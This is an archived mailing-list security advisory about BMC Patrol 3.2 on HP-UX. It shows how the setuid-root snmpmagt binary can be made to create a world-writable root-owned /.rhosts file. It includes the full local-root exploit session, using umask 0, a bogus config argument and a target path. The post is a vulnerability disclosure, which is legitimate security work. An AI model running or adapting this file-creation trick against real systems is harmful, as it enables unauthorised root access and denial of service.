Problem in Patrol 3.2 --------------------- vendor: Copyright 1993-97 BMC Software, Inc. how bad: local root/denial of service example: maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt -rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt* maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts /.rhosts not found maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0 (first argument must be either an invalid config file or a file that doesn't exist) maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts yoyoyo: No such file or directory snmp bind failure: Address already in use /opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts -rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts note: if the file exists it keeps the same perms, otherwise creates it with perms based on your umask and chown's to whoever owns the parent directory of the file you're creating. if the file exists it overwrites it with "i^A" then the result of gethostname() and some whitespace. this problem is not platform dependent and was tested based on out of box install on an HP. - aalnessat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:52:10 PDT